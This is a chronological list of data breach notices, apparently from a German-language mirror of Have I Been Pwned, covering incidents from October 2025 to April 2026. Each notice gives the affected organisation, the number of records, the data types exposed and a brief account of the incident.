| 07.04.2026 - My Lovely AI | 106.271 Datensätze geleaked | |
| Email addresses, Social media profiles In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames. |
||
| 02.04.2026 - SongTrivia2 | 291.739 Datensätze geleaked | |
| Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars. |
||
| 31.03.2026 - Hallmark | 1.736.520 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets. |
||
| 26.03.2026 - BreachForums Version 5 | 339.778 Datensätze geleaked | |
| Email addresses, Passwords, Usernames In March 2026, a breach of one of the many iterations of the BreachForums hacking forum known as "Version 5" was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes. |
||
| 25.03.2026 - Sound Radix | 292.993 Datensätze geleaked | |
| Email addresses, Names, Passwords In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that it is possible that additional data including hashed passwords may have been exposed, and that no financial or credit card information was impacted. |
||
| 13.03.2026 - Divine Skins | 105.814 Datensätze geleaked | |
| Email addresses, Purchases, Usernames In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users. |
||
| 12.03.2026 - Crunchyroll | 1.195.684 Datensätze geleaked | |
| Email addresses In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being sold was later provided to HIBP. |
||
| 08.03.2026 - Baydöner | 1.266.822 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included Turkish national ID number and date of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected. |
||
| 06.03.2026 - Aura | 903.080 Datensätze geleaked | |
| Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised. |
||
| 04.03.2026 - SUCCESS | 253.510 Datensätze geleaked | |
| Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS' disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors. |
||
| 25.02.2026 - KomikoAI | 1.060.191 Datensätze geleaked | |
| AI prompts, Email addresses, Forum posts, Names In February, the AI-powered comic generation platform KomikoAI suffered a data breach. The incident exposed 1M unique email addresses along with names, user posts and the AI prompts used to generate content. The exposed data enables the mapping of individual AI prompts to specific email addresses. |
||
| 25.02.2026 - Lovora | 495.556 Datensätze geleaked | |
| Display names, Email addresses, Profile photos In February 2026, the couples and relationship app Lovora allegedly suffered a data breach that exposed 496k unique email addresses. The data also included users’ display names and profile photos, along with other personal information collected through use of the app. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident. |
||
| 17.02.2026 - Quitbro | 22.874 Datensätze geleaked | |
| Email addresses, Partial dates of birth, Usernames In February 2026, the porn addiction app Quitbro allegedly suffered a data breach that exposed 23k unique email addresses. The data also included users’ years of birth, responses to questions within the app and their last recorded relapse time. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident. |
||
| 14.02.2026 - CarGurus | 12.461.887 Datensätze geleaked | |
| Email addresses, IP addresses, Names, Phone numbers, Physical addresses In February 2026, the automotive marketplace CarGurus was the target of a data breach attributed to the threat actor ShinyHunters. Following an attempted extortion, the data was published publicly and contained more than 12M email addresses across multiple files including user account ID mappings, finance pre-qualification application data and dealer account and subscription information. Impacted data also included names, phone numbers, physical and IP addresses, and auto finance application outcomes. |
||
| 12.02.2026 - Odido | 6.077.025 Datensätze geleaked | |
| Bank account numbers, Customer service comments, Dates of birth, Driver's licenses, Email addresses, Genders, Government issued IDs, Names, Passport numbers, Phone numbers, Physical addresses In February 2026, Dutch telco Odido was the victim of a data breach and subsequent extortion attempt. Shortly after, a total of 6M unique email addresses were published across four separate data releases over consecutive days. The exposed data includes names, physical addresses, phone numbers, bank account numbers, dates of birth, customer service notes and passport, driver’s licence and European national ID numbers. Odido has published a disclosure notice including an FAQ to support affected customers. |
||
| 06.02.2026 - Toy Battles | 1.017 Datensätze geleaked | |
| Chat logs, Email addresses, IP addresses, Usernames In February 2026, the online gaming community Toy Battles suffered a data breach. The incident exposed 1k unique email addresses alongside usernames, IP addresses and chat logs. Following the breach, Toy Battles self-submitted the data to Have I Been Pwned. |
||
| 30.01.2026 - Association Nationale des Premiers Secours | 5.600 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Places of birth, Salutations In January 2026, a data breach impacting the French non-profit Association Nationale des Premiers Secours (ANPS) was posted to a hacking forum. The breach exposed 5.6k unique email addresses along with names, dates of birth and places of birth. ANPS self-submitted the data to HIBP and advised the incident was traced back to a legacy system and did not impact health data, financial information or passwords. |
||
| 30.01.2026 - Provecho | 712.904 Datensätze geleaked | |
| Email addresses, Usernames In early 2026, data purportedly sourced from the recipe and meal planning service Provecho was alleged to have been obtained in a breach. The exposed data included 713k unique email address along with username and the creator account holders followed. Provecho has been notified and is aware of the claims surrounding the incident. |
||
| 28.01.2026 - Figure | 967.178 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Phone numbers, Physical addresses In February 2026, data obtained from the fintech lending platform Figure was publicly posted online. The exposed data, dating back to January 2026, contained over 900k unique email addresses along with names, phone numbers, physical addresses and dates of birth. Figure confirmed the incident and attributed it to a social engineering attack in which an employee was tricked into providing access. |
||
| 24.01.2026 - CarMax | 431.371 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In January 2026, data allegedly sourced from US automotive retailer CarMax was published online following a failed extortion attempt. The data included 431k unique email addresses along with names, phone numbers and physical addresses. |
||
| 09.01.2026 - Betterment | 1.435.174 Datensätze geleaked | |
| Dates of birth, Device information, Email addresses, Employers, Geographic locations, Job titles, Names, Phone numbers, Physical addresses In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack. As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to an attacker-controlled cryptocurrency wallet. The breach exposed 1.4M unique email addresses, along with names and geographic location data. A subset of records also included dates of birth, phone numbers, and physical addresses. In its disclosure notice, Betterment stated that the incident did not provide attackers with access to customer accounts and did not expose passwords or other login credentials. |
||
| 07.01.2026 - Instagram | 6.215.150 Datensätze geleaked | |
| Display names, Email addresses, Geographic locations, Phone numbers, Usernames In January 2026, data allegedly scraped via an Instagram API was posted to a popular hacking forum. The dataset contained 17M rows of public Instagram information, including usernames, display names, account IDs, and in some cases, geolocation data. Of these records, 6.2M included an associated email address, and some also contained a phone number. The scraped data appears to be unrelated to password reset requests initiated on the platform, despite coinciding in timeframe. There is no evidence that passwords or other sensitive data were compromised. |
||
| 07.01.2026 - Panera Bread | 5.112.502 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In January 2026, Panera Bread suffered a data breach that exposed 14M records. After an attempted extortion failed, the attackers published the data publicly, which included 5.1M unique email addresses along with associated account information such as names, phone numbers and physical addresses. Panera Bread subsequently confirmed that "the data involved is contact information" and that authorities were notified. |
||
| 29.12.2025 - WhiteDate | 20.363 Datensätze geleaked | |
| Ages, Astrological signs, Bios, Device information, Education levels, Email addresses, Family structure, Forum posts, Genders, Geographic locations, Income levels, IP addresses, IQ levels, Nicknames, Passwords, Physical attributes, Private messages, Profile photos, Races, Relationship statuses, Sexual orientations, Usernames In December 2025, the dating website "for a Europid vision" WhiteDate suffered a data breach that was subsequently leaked online, initially exposing 6.1k unique email addresses. The leaked data included extensive personal information such as physical appearance, income, education and IQ. A more comprehensive dataset was later provided to HIBP, containing usernames, IP addresses, private messages, phpBB password hashes and a total of 20k unique email addresses. |
||
| 17.12.2025 - Pass'Sport | 6.366.133 Datensätze geleaked | |
| Email addresses, Genders, Names, Phone numbers, Physical addresses In December 2025, data from France's Pass'Sport program was posted to a popular hacking forum. Initially misattributed to CAF (the French family allowance fund), the data contained 6.5M unique email addresses affecting 3.5M households. The data also included names, phone numbers, genders and physical addresses. The Ministry of Sports subsequently released a statement acknowledging the incident. |
||
| 16.12.2025 - APOIA.se | 450.764 Datensätze geleaked | |
| Email addresses, Names, Physical addresses In December 2025, a database of the Brazilian crowdfunding platform APOIA.se was posted to an online forum. In January 2026, the company confirmed it had suffered a data breach. The incident exposed 451k unique email addresses along with names and physical addresses. |
||
| 15.12.2025 - Raaga | 10.225.145 Datensätze geleaked | |
| Ages, Dates of birth, Email addresses, Genders, Geographic locations, Names, Passwords In December 2025, data allegedly breached from the Indian streaming music service "Raaga" was posted for sale to a popular hacking forum. The data contained 10M unique email addresses along with names, genders, ages (in some cases, full date of birth), postcodes and passwords stored as unsalted MD5 hashes. |
||
| 15.12.2025 - SoundCloud | 29.815.722 Datensätze geleaked | |
| Avatars, Email addresses, Geographic locations, Names, Profile statistics, Usernames In December 2025, SoundCloud announced it had discovered unauthorised activity on its platform. The incident allowed an attacker to map publicly available SoundCloud profile data to email addresses for approximately 20% of its users. The impacted data included 30M unique email addresses, names, usernames, avatars, follower and following counts and, in some cases, the user’s country. The attackers later attempted to extort SoundCloud before publicly releasing the data the following month. |
||
| 17.11.2025 - Under Armour | 72.742.892 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Names, Purchases In November 2025, the Everest ransomware group claimed Under Armour as a victim and attempted to extort a ransom, alleging they had obtained access to 343GB of data. In January 2026, customer data from the incident was published publicly on a popular hacking forum, including 72M email addresses. Many records also contained additional personal information such as names, dates of birth, genders, geographic locations and purchase information. |
||
| 15.11.2025 - CodeStepByStep | 103.077 Datensätze geleaked | |
| Email addresses, Names, Usernames In November 2025, the online coding practice tool CodeStepByStep suffered a data breach that exposed 17k records which were subsequently published online. The following month, a further corpus of data was released bringing the total to 103k. The impacted data included names, usernames and email addresses. |
||
| 13.11.2025 - Eurofiber | 10.003 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In November 2025, Eurofiber France disclosed a data breach of its ticket management platform. Data containing 10k unique email addresses and a smaller number of names and phone numbers was subsequently leaked. A threat actor claiming responsibility for the breach alleges to have additional, more sensitive data including screenshots, VPN configuration files, credentials, source code, certificates, archives, and SQL backup files. |
||
| 13.11.2025 - Operation Endgame 3.0 | 2.046.030 Datensätze geleaked | |
| Email addresses, Passwords Between 10 and 13 November 2025, the latest phase of Operation Endgame was coordinated from Europol's headquarters in The Hague. The actions targeted one of the biggest infostealer Rhadamanthys, the Remote Access Trojan VenomRAT, and the botnet Elysium, all of which played a key role in international cybercrime. Authorities took down these three large cybercrime enablers and provided 2 million impacted email addresses and 7.4 million passwords to HIBP. |
||
| 11.11.2025 - International Kiteboarding Organization | 340.349 Datensätze geleaked | |
| Email addresses, Geographic locations, Names, Usernames In November 2025, the International Kiteboarding Organization suffered a data breach that exposed 340k user records. The data was subsequently listed for sale on a hacking forum and included email addresses, names, usernames and in many cases, the user's city and country. |
||
| 09.11.2025 - Beckett Collectibles | 1.041.238 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Usernames In November 2025, Beckett Collectibles experienced a data breach accompanied by website content defacement. The stolen data was later advertised for sale on a prominent hacking forum, with portions subsequently released publicly. The publicly circulating data initially included more than 500k email addresses reportedly belonging to North American customers, before a larger corpus of over 1M addresses was published the following month. The impacted data included names, usernames, phone numbers and physical addresses. |
||
| 06.11.2025 - Zilvia.net | 287.863 Datensätze geleaked | |
| Email addresses, IP addresses, Passwords, Usernames In November 2025, data breached from the Zilvia.net Nissan 240SX Silvia and Z Fairlady car forum was leaked. The breach exposed 288k unique email addresses along with usernames, IP addresses and salted MD5 password hashes sourced from the vBulletin based platform. Attempts to contact Zilvia.net about the incident were unsuccessful. |
||
| 30.10.2025 - University of Pennsylvania | 623.750 Datensätze geleaked | |
| Charitable donations, Dates of birth, Email addresses, Genders, Income levels, Job titles, Names, Physical addresses, Religions, Salutations, Spouses names In October 2025, the University of Pennsylvania was the victim of a data breach followed by a ransom demand, largely affecting its donor database. After the incident, the attackers sent inflammatory emails to some victims. The data was later published online in February 2026 and included 624k unique email addresses alongside names and physical addresses. For some donor records, additional personal information was exposed, including gender and date of birth. A small subset of records also contained religion, spouse name, estimated income and donation history. |
||
| 24.10.2025 - MyVidster (2025) | 3.864.364 Datensätze geleaked | |
| Email addresses, Profile photos, Usernames In October 2025, the data of almost 4M MyVidster users was posted to a public hacking forum. Separate to the 2015 breach, this incident exposed usernames, email addresses and in a small number of cases, profile photos. |
||
| 23.10.2025 - Substack | 663.121 Datensätze geleaked | |
| Email addresses, Phone numbers In October 2025, the publishing platform Substack suffered a data breach that was subsequently circulated more widely in February 2026. The breach exposed 663k account holder records containing email addresses along with publicly visible profile information from Substack accounts, such as publication names and bios. A subset of records also included phone numbers. |
||
| 06.10.2025 - TISZA Világ | 198.520 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Usernames In late October 2025, data breached from the Hungarian political party TISZA was published online before being extensively redistributed. Stemming from a compromise of the TISZA Világ service earlier in the month, the breach exposed 200k records of personal data including email addresses along with names, phone numbers and physical addresses. |
||
| 02.10.2025 - Canadian Tire | 38.306.562 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Names, Partial credit card data, Passwords, Phone numbers, Physical addresses In October 2025, retailer Canadian Tire was the victim of a data breach that exposed almost 42M records. The data contained 38M unique email addresses along with names, phone numbers and physical addresses. Passwords were stored as PBKDF2 hashes and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry and masked card number). In its disclosure notice, Canadian Tire advised that the incident did not impact bank account information or loyalty program data. |
||